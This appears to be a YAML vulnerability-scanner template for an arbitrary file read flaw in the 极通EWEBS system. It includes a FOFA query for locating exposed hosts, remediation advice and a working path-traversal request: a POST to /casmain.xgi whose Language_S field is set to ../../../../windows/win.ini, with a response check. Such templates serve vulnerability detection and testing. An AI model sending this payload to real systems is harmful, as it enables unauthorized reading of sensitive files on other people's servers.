product: 极通Ewebs
vName: 极通Ewebs系统的任意文件访问漏洞
type: 文件读取
vID:
  - wooyun-2015-0121875
level: 0
vDesc: 极通EWEBS系统的casmain.xgi页面存在可控参数，导致攻击者可以访问任意系统文件，泄露的敏感信息。
version: ''
note: ''
search:
  FOFA: app="新软科技-极通EWEBS"
protocol: http
link: https://www.modb.pro/db/120385
fix:
  - 对用户输入做控制，最好使用白名单。
  - 禁止 ../ 与其变形。
  - 限制文件访问权限
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /casmain.xgi
      dataJson:
        Language_S: ../../../../windows/win.ini
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - for 16-bit app support
            logic: and